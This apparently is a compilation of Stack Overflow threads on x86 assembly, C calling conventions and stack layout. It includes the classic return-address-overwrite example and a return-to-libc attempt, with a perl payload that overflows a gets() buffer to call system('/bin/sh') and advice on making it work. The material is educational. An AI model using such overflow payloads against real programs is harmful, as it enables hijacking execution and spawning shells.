I want to make a function in assembler to be called from c that will write a byte(char) to the file. Here is how function should look in c:
void writebyte (FILE *f, char b)
{
fwrite(&b, 1, 1, f);
}
And here is the code that will call it:
#include <stdio.h>
extern void writebyte(FILE *, char);
int main(void) {
FILE *f = fopen("test.txt", "w");
writebyte(f, 1);
fclose(f);
return 0;
}
So far I came up with following assembler code:
.global writebyte
writebyte:
pushl %ebp
movl %esp, %ebp #standard params
pushl 12(%ebp) # pushing byte to the stack
pushl $1
pushl $1
pushl 8(%ebp) #file to write
call fwrite
popl %ebp
ret
I keep getting from gdb:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffa9702c in ?? ()
How do I write such a function in assembly?
EDIT: I am using Ubuntu 16.04
According to cdecl convention, you should push the arguments in reverse order. So f should go first and b should go last. Also the stack should be cleaned up by the caller after calling fwrite().
As noted in the comments, b will be received as value, but we need to pass it to fwrite() as pointer. The pointer will be equal to the value of ebp + 12.
This seems to work for me:
.global writebyte
writebyte:
//create new stack frame
pushl %ebp
movl %esp, %ebp
//push the four arguments to stack (in reverse order)
pushl 8(%ebp)
pushl $1
pushl $1
//get pointer of "b" argument (%ebp+12) and move it to %eax
leal 12(%ebp), %eax
pushl %eax
//call fwrite()
call fwrite
//remove arguments from stack and pop %ebp
leave
ret
Related
I'm trying to learn some assembly.
My goal is to create an external assembly function that is able to read an array of char, cast to int and then execute various operation, just to learn something.
I've done many proofs but i think i'm missing the point
code:
#include <stdio.h>
#define SIZE 5
extern int foo(char array[]);
int main(void){
char array[SIZE]={'0','1','1','0','1'};
printf("GAS said: %c\n", foo(array));
return 0;
}
assembly:
.data
.text
.global foo
foo:
pushl %ebp
movl %esp, %ebp
movl 8(%esp), %eax #saving in eax the pointer of the array
movl (%eax), %eax #saving in eax the first char of the array
popl %ebp
ret
The strange thing for me is here:
when i use, like in this case
printf("GAS said: %c\n", foo(array));
The output is, as expected, GAS said: 0
Based on this, i was expecting also that changing with:
printf("GAS said: %i\n", foo(array));
will output GAS said: 48 but instead i get in return some random address.
Also, in the assembly file, i can't explain why if i try to
cmpl $48, %eax
je LABEL
the jump will never happen.
The only thing i can think of is that there is a problem with the size, since int takes 4B and char only 1B but i'm not so sure.
So, how can i use compare and return an int to main in this case?
In the given url this function is given:
http://insecure.org/stf/smashstack.html
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = buffer1 + 12;
(*ret) += 8;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
The corresponding assembly code for main function is:
Dump of assembler code for function main:
0x8000490 <main>: pushl %ebp
0x8000491 <main+1>: movl %esp,%ebp
0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
In the variable ret, they are pointing ret to the address of the next instruction to be run. I cannot understand that just by keeping the next instruction in the ret variable, how is the program going to jump to this next location?
I know how buffer overflow works, but by changing the ret variable, how is this doing buffer overflow?
Even by considering that this is a dummy program and is just supposed to let us understand how buffer overflow works, changing the ret variable seems wrong.
Explanation of how this is an example of a buffer overrun:
The local variables of function, including buffer1, are on the stack, along with the return address, which is calculated as being 12 bytes beyond buffer1. This is an example of a buffer overrun because writing to an address 12 bytes beyond buffer1 is writing outside the proper bounds of buffer1. By replacing the return address by a number 8 larger than it was, when function finishes, rather than popping off a return to the statement following the function call as usual (x = 1;, in this case), the return address will be 8 bytes later (at the printf statement, in this case).
Skipping the x = 1; statement is not the buffer overflow -- it's the effect of the buffer overflow which modified the return address.
Note on the calculation of 8 as the proper offset for skipping x = 1; statement:
See also FrankH's careful reevaluation of the calculation of 8 as the proper offset to add to the return address to achieve the intent of skipping x = 1;. His findings contradict the GDB-based analysis of the insecure.org source article. Regardless of this detail, the explanation of how a buffer overrun is used to change the return address remains the same -- it's just a question of what to write into the overrun.
For completeness, here is the GDB-based analysis of the insecure.org source article:
What we have done is add 12 to buffer1[]'s address. This new
address is where the return address is stored. We want to skip pass
the assignment to the printf call. How did we know to add 8 to the
return address? We used a test value first (for example 1), compiled
the program, and then started gdb:
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 <main>: pushl %ebp
0x8000491 <main+1>: movl %esp,%ebp
0x8000493 <main+3>: subl $0x4,%esp
0x8000496 <main+6>: movl $0x0,0xfffffffc(%ebp)
0x800049d <main+13>: pushl $0x3
0x800049f <main+15>: pushl $0x2
0x80004a1 <main+17>: pushl $0x1
0x80004a3 <main+19>: call 0x8000470 <function>
0x80004a8 <main+24>: addl $0xc,%esp
0x80004ab <main+27>: movl $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>: movl 0xfffffffc(%ebp),%eax
0x80004b5 <main+37>: pushl %eax
0x80004b6 <main+38>: pushl $0x80004f8
0x80004bb <main+43>: call 0x8000378 <printf>
0x80004c0 <main+48>: addl $0x8,%esp
0x80004c3 <main+51>: movl %ebp,%esp
0x80004c5 <main+53>: popl %ebp
0x80004c6 <main+54>: ret
0x80004c7 <main+55>: nop
We can see that when calling function() the RET will be 0x8004a8,
and we want to jump past the assignment at 0x80004ab. The next
instruction we want to execute is the at 0x8004b2. A little math
tells us the distance is 8 bytes.
A little better math tells us that the distance is 0x8004a8 - 0x8004b2 = 0xA or 10 bytes, not 8 bytes.
The layout on the stack is like this (addresses downwards - as stacks grow):
buffer + ... value found description
=================================================================================
+24 3 # from main, pushl $0x3
+20 2 # from main, pushl $0x2
+16 1 # from main, pushl $0x1
+12 <main+24> # from main, call 0x8000470 <function>
+8 <frameptr main> # from function, pushl %ebp
+4 %ebp(function) padding (3 bytes) # ABI - compiler will not _pack_ vars
+0 buffer[5];
... buffer1[12]; # might be optimized out (unused)
... int *ret # might be optimized out (reg used instead)
The tricky thing is that buffer starts at a four-byte-aligned address even though it's not sized a multiple of four bytes. The "effective size" is eight bytes, so if you add eight bytes to the start of it, you find the saved framepointer, and if you go another four bytes down, the saved return address (which, according to your disassembly, is main+0x24 / 0x80004a8. Adding 8 to that jumps "into the middle" of two intructions, the result is garbage - you're not skipping the x = 1 statement.
Why does this function allocate more stack space than it needs to, before calling gets()?
echo:
pushl %ebp
movl %esp, %ebp
pushl %ebx
leal -8(%ebp), %ebx
subl $20, %esp <-- Why so much space?
movl %ebx, (%esp)
call gets
...
The corresponding C code:
void echo()
{
char buf[4];
gets(buf);
puts(buf);
}
Why is there an additional extra space of three words between the buffer and the argument for gets?
There are two sentences in the book Computer Systems.
"gcc adhere to an x86 programming guideline that the total stack space used by the function should be multiple of 16 bytes." and "Including the 4 bytes for the saved %ebp and the 4 bytes for the return address,"
I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack).
This is my program:
int main(int argc, char **argv) {
char array[512];
gets(array);
}
I'm using gets instead of strcopy, because my addresses start with 0x00 and strcpy thinks it's the end of a string, so I can't use it.
Here are the addresses that I need:
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb) x/s 0xbffffe3f
0xbffffe3f: "/bin/sh"
When inputing the right sequence, this happens:
eleanor#eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor#eleanor32:~/testing/root$
so nothing.
But if I enter 520 'A's (0x41), then the EIP is overflown with 'A's. If there's 516 'A', nothing happens but EIP contains the system address, following the exit address, following the /bin/sh pointer.
Why nothing happened?
Let's do some asm before:
Code
$ cat gets.c
int main(int argc, char **argv) {
char array[512];
gets(array);
}
Asm
$ gcc gets.c -o getsA.s -S -fverbose-asm
$ cat gets.s
....
.globl main
.type main, #function
main:
leal 4(%esp), %ecx #,
andl $-16, %esp #,
pushl -4(%ecx) # (1)
pushl %ebp # 2
movl %esp, %ebp #,
pushl %ecx # 3
subl $516, %esp #,
leal -516(%ebp), %eax #, tmp60
movl %eax, (%esp) # tmp60,
call gets # << break here
addl $516, %esp #, << or here to see the stack picture
popl %ecx # (3')
popl %ebp # (2')
leal -4(%ecx), %esp # (1')
ret
.size main, .-main
The prologue and epilogue (these are with alignment code) is described in detail here Understanding the purpose of some assembly statements
Stack layout:
(char) array[0]
...
(char) array[511]
(32bit) $ecx - pushed by 3 - it was the address on the stack of the eip which main will return to
(32bit) $ebp - pushed by 2
(32bit) $esp - pushed by 1 - change the $esp to the original value
So, if you want to change a return address of main, you should not to change address in stack which will be used by ret, but also to repeat the values saved in stack by (1),(2),(3) pushes. Or you can embed a new return address in the array itself and overwrite only (3) by the your new stack address+4. (use 516 byte string)
I suggest you use this source code to hack it:
$ cat getss.c
f()
{
char array[512];
gets(array);
}
int main(int argc, char **argv) {
f();
}
because f have no problems with stack realignement
.globl f
.type f, #function
f:
pushl %ebp #
movl %esp, %ebp #,
subl $520, %esp #,
leal -512(%ebp), %eax #, tmp59
movl %eax, (%esp) # tmp59,
call gets #
leave
ret
.size f, .-f
Stack layout for f():
(char) array[0]
...
(char) array[511]
(32bit) old ebp
(32bit) return address
Breakpoint at ret instruction in f() with 520 bytes of "A"
(gdb) x/w $sp
0xXXXXXa3c: 0x41414141
I was just playing with the call stack, trying to change the return address of a function etc, and wound up writing this program in C:
#include<stdio.h>
void trace(int);
void func3(int);
void func2(int);
void func1(int);
int main(){
int a = 0xAAAA1111;
func1(0xFCFCFC01);
return 0;
}
void func1(int a){
int loc = 0xBBBB1111;
func2(0xFCFCFC02);
}
void func2(int a){
int loc1 = 0xCCCC1111;
int loc2 = 0xCCCC2222;
func3(0xFCFCFC03);
}
void func3(int a){
int loc1 = 0xDDDD1111;
int loc2 = 0xDDDD2222;
int loc3 = 0xDDDD3333;
trace(0xFCFCFC04);
}
void trace(int a){
int loc = 0xEEEE1111;
int *ptr = &loc;
do {
printf("0x%08X : %08X\n", ptr, *ptr, *ptr);
} while(*(ptr++) != 0xAAAA1111);
}
(sorry for the length)
This produced the following output (with comments that I added):
0xBF8144D4 : EEEE1111 //local int in trace
0xBF8144D8 : BF8144F8 //beginning of trace stack frame
0xBF8144DC : 0804845A //return address for trace to func3
0xBF8144E0 : FCFCFC04 //int passed to trace
0xBF8144E4 : 08048230 //(possibly) uninitialized padding
0xBF8144E8 : 00000000 //padding
0xBF8144EC : DDDD3333 //local int in func3
0xBF8144F0 : DDDD2222 //local int in func3
0xBF8144F4 : DDDD1111 //local int in func3
0xBF8144F8 : BF814518 //beginning of func3 stack frame
0xBF8144FC : 08048431 //return address for func3 to func2
0xBF814500 : FCFCFC03 //parameter passed to func3
0xBF814504 : 00000000 //padding
0xBF814508 : 00000000 //padding
0xBF81450C : 00000000 //padding
0xBF814510 : CCCC2222 //local int in func2
0xBF814514 : CCCC1111 //local int in func2
0xBF814518 : BF814538 //beginning of func2 stack frame
0xBF81451C : 0804840F //return address for func2 to func1
0xBF814520 : FCFCFC02 //parameter passed to func2
0xBF814524 : 00000000 //padding
0xBF814528 : BF816728 //uninitialized padding
0xBF81452C : B7DF3F4E //uninitialized padding
0xBF814530 : B7EA61D9 //uninitialized padding
0xBF814534 : BBBB1111 //local int in func1
0xBF814538 : BF814558 //beginning of func1 stack frame
0xBF81453C : 080483E8 //return address for func1 to main
0xBF814540 : FCFCFC01 //parameter passed to func1
0xBF814544 : 08049FF4 //(maybe) padding
0xBF814548 : BF814568 //(maybe) padding
0xBF81454C : 080484D9 //(maybe) padding
0xBF814550 : AAAA1111 //local int in main
I was wondering if anybody could fill me in on the blank spots here... I'm running Ubuntu linux compiling with gcc 4.3.3 (on an x86 -- AMD Turion 64)
What are the 0804... numbers? What's the third address up from the bottom? Is that the return address for main? If so, why is it out of order compared to the rest of the stack?
The 0x0804 numbers are return addresses, or pointers to code/data or something, while the 0xBF814 numbers are stack pointers
What's this:
0xBF814524 : 00000000 //padding?
0xBF814528 : BF816728 //I have no idea
0xBF81452C : B7DF3F4E //????
0xBF814530 : B7EA61D9 //????
seen just after the local int in func1?
Okay I have my stack dump almost completely filled in.
It looks like the the compiler wants to have the parameters pushed onto the stack starting at a 0x.......0 address, and everything between the local variables from the function before and the first parameter of the function being called seems to be padding (whether 0x00000000 or some uninitialized value). Some of them I'm unsure about because they look like code/data segment pointers, but I can't see them being used in the code: they're just there when the stack pointer gets reduced.
and I know it's a HUGE nono to touch the call stack in any kind of project, but that's okay. It's fun, right?
also
Greg wants to see the assembly,
here it is
.file "stack.c"
.text
.globl main
.type main, #function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
movl $-1431695087, -8(%ebp)
movl $-50529279, (%esp)
call func1
movl $0, %eax
addl $20, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.globl func1
.type func1, #function
func1:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-1145368303, -4(%ebp)
movl $-50529278, (%esp)
call func2
leave
ret
.size func1, .-func1
.globl func2
.type func2, #function
func2:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-859041519, -4(%ebp)
movl $-859037150, -8(%ebp)
movl $-50529277, (%esp)
call func3
leave
ret
.size func2, .-func2
.globl func3
.type func3, #function
func3:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-572714735, -4(%ebp)
movl $-572710366, -8(%ebp)
movl $-572705997, -12(%ebp)
movl $-50529276, (%esp)
call trace
leave
ret
.size func3, .-func3
.section .rodata
.LC0:
.string "0x%08X : %08X\n"
.text
.globl trace
.type trace, #function
trace:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
movl $-286387951, -4(%ebp)
leal -4(%ebp), %eax
movl %eax, -8(%ebp)
.L10:
movl -8(%ebp), %eax
movl (%eax), %edx
movl -8(%ebp), %eax
movl (%eax), %eax
movl %edx, 12(%esp)
movl %eax, 8(%esp)
movl -8(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC0, (%esp)
call printf
movl -8(%ebp), %eax
movl (%eax), %eax
cmpl $-1431695087, %eax
setne %al
addl $4, -8(%ebp)
testb %al, %al
jne .L10
leave
ret
.size trace, .-trace
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",#progbits
Inspecting the stack like this seems like one step too far away. I might suggest loading your program in a debugger, switching to the assembly language view, and single stepping through every machine instruction. Understanding of the CPU stack necessarily requires an understanding of the machine instructions operating on it, and this will be a more direct way to see what's going on.
As others mentioned, the structure of the stack is also highly dependent on the processor architecture you're working with.
Most likely those are stack canaries. Your compiler adds code to push additional data to the stack and read it back afterwards to detect stack overflows.
I'm guessing those values starting with 0x0804 are addresses in your program's code segement (like return addresses for function calls). The ones starting with 0xBF814 that you've labeled as return addresses are addresses on the stack -- data, not code. I'm guessing they're probably frame pointers.
As already pointed out, the 0xBF... are frame pointers and 0x08... return addresses.
The padding is due to alignment issues. Other unrecognized values are also padding as the stack is not initalized to zero or any other value. Uninitialized variables and unused padding space will contain whatever bytes are in those memory locations.
The 0xBF... addresses will be links to the previous stack frame:
0xBF8144D8 : BF8144F8 //return address for trace
0xBF8144DC : 0804845A //
0xBF8144F8 : BF814518 //return address for func3
0xBF8144FC : 08048431 //????
0xBF814518 : BF814538 //return address for func2?
0xBF81451C : 0804840F //????
0xBF814538 : BF814558 //return address for func1
0xBF81453C : 080483E8 //????
The 0x08... addresses will be the addresses of the code to return to in each case.
I can't speak for the other stuff on the stack; you would have to step through the assembly language and see exactly what it is doing. I guess that it is aligning the start of each frame to a specific alignment so that __attribute__((align)) (or whatever it's called these days...) works.
The compiler uses EBP to store the frame's base address. It's been a while so I looked at this, so I may get the details a bit wrong, but the idea is like this.
You have three steps when calling a function:
The caller pushes the function's parameters onto the stack.
The caller uses the call instruction, which pushes the return address onto the stack, and jumps to the new function.
The called function pushes EBP onto the stack, and copies ESP into EBP:
(Note: well behaved functions will also push all the GPRs onto the stack with PUSHAD)
push EBP
mov EBP, ESP
When the function returns it:
pops EBP
executes the ret instruction, which pops off the return address and jumps there.
pop EBP
ret
The question is, why is EBP pushed, and why does ESP get copied into it?
When you enter the function ESP points to the lowest point on the stack for this function. Any variables you declare on the stack can be accessed as [ESP + offset_to_variable]. This is easy! But note that ESP must always point to the top of the stack, so when you declare a new variable on the stack, ESP changes. Now [ESP + offset_to_variable] isn't so great, because you have to remember what ESP was at the time the variable was allocated.
Instead of doing that, the first thing the function needs to do is to copy ESP into EBP. EBP won't change during the life of the function, so you can access all variables using `[EBP + offset_to_variable]. But now you have another problem, because if the called functions calls another function, EBP will be overwritten. That's why before copying EBP it needs to be saved onto the stack, so that it can be restored before the returning to the calling function.
Is this a debug or release build? I'd expect some padding with the debug builds for detecting Stack Overflows.